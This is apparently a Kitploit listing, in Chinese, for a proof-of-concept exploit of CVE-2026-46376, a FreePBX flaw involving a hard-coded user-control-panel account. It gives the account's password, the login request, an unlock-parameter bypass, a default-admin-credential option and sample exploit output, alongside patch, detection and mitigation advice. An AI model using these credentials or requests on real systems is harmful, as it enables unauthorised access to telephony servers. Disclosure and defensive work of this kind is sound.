Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-46376 — CVE-2026-46376 - FreePBX 通过硬编码凭据实现未认证的 UCP 访问 | Kitploit
工具/GitHubGitHub/portbuster1337/cve-2026-46376
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证论文与研究学习与教育
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - FreePBX 通过硬编码凭据实现未认证的 UCP 访问

查看仓库
184个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-46376 — FreePBX 未授权UCP访问(硬编码凭据)

FreePBX 用户管理(userman)模块中的一个严重漏洞,允许未经身份验证的攻击者使用在 UCP 通用模板设置过程中嵌入的硬编码凭据访问用户控制面板(UCP)。

CVSS v4.0: 9.1(严重) | CWE-798: 使用硬编码凭据

披露时间:2026年5月15日 | 报告者:s0nnyWT

详情

当管理员使用可选的 UCP 通用模板设置功能(2021 年引入)时,会创建一个系统用户 FreePBXUCPTemplateCreator,其密码为硬编码、静态的。如果管理员在设置后从未更改过此密码,网络上的任何未授权用户都可以使用这些凭据登录 UCP。

字段值
用户名FreePBXUCPTemplateCreator
密码1a2b3c@fd48jshs03123ld
来源Userman.class.php — 密码经过 md5() 处理
攻击向量网络
复杂度低
所需认证无
用户交互无
先决条件管理员必须运行过 UCP 通用模板设置

注意: FreePBXUCPTemplateCreator 用户仅在管理员明确运行 UCP 通用模板设置功能时才会创建。即使运行受影响版本,如果从未执行此设置,系统也不会因此 CVE 被利用。

受影响版本

平台userman 模块受影响已修复
FreePBX 15—15.0.42+不适用
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7

修复措施在安装/升级过程中使用 bin2hex(random_bytes(24)) 随机化密码,并且现有模板创建者会在升级时重新生成密码。

PoC 使用方法

pip3 install requests
python3 poc.py <target_url>

选项

positional arguments:
  target              Target URL (e.g. http://192.168.1.100)

optional arguments:
  -h, --help          show this help message and exit
  --no-check          Skip version pre-flight check
  --timeout TIMEOUT   Request timeout in seconds (default: 15)
  --method {creds,unlock,admin,all}
                      Which exploit method to run (default: all)
  -y, --yes           Auto-continue even if version is out of range

方法

  1. creds — 通过 POST /ucp/ajax.php 使用 module=User&command=login 和硬编码凭据登录 UCP
  2. unlock — 尝试通过 ?unlockkey=&templateid= 查询参数绕过解锁密钥
  3. admin — 在 ACP 上尝试常见的默认管理员凭据

示例

$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - FreePBX UCP Access
  Target: http://192.168.1.100
============================================

[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
  Exploitation
============================================

============================================
  Method 1: Hard-Coded UCP Credentials
============================================
    Username: FreePBXUCPTemplateCreator
    Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
  Summary
============================================
Target is VULNERABLE

检测

要检查系统是否可被利用,PoC 会向 POST /ucp/ajax.php 发送登录请求,参数为 module=User&command=login 并带上凭据。如果返回 {"status":true},则表示模板创建者用户存在且密码仍是默认值。

返回 {"status":false,"message":"Invalid Login Credentials"} 表示以下两种情况之一:

  • 该用户不存在(从未运行模板设置),或
  • 密码已被轮换

缓解措施

  • 将 userman 模块更新至 16.0.45(FreePBX 16)或 17.0.7(FreePBX 17)
  • 检查并轮换任何现有的 UCP 模板凭据——打补丁不会追溯更改已部署的密码
  • 使用 FreePBX 防火墙模块将 ACP/UCP 访问限制到受信网络
  • 启用 MFA 或 SAML 以增加额外的认证层
  • 审计活跃的 UCP 会话,查找未授权登录

免责声明

本 PoC 仅供教育和授权的安全测试目的使用。未经授权对不属于您或未获得明确测试许可的系统使用此漏洞利用工具是违法的。作者不对因使用本工具造成的任何滥用或损害负责。

参考

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • FreePBX userman commit (引入)
下载工具